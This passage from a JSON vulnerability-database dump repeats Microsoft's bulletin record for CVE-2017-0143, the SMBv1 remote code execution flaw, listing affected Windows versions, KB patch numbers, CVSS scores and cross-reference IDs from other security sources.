["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:49:52", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T20:59:37", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210721", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3212646", "KB4012216", "KB4013198", "KB3205401", "KB4012214", "KB4012212", "KB4012215", "KB4012598", "KB4013429", "KB4012606", "KB4012213", "KB3205409", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:59:37", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T02:45:21", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3205409", "KB4012214", "KB4012215", "KB3177186", "KB4012598", "KB4013198", "KB4012216", "KB4012212", "KB4013429", "KB4012606", "KB3205401", "KB4012213", "KBMS16-110, 3187754", "KB3212646", "KB4012217", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
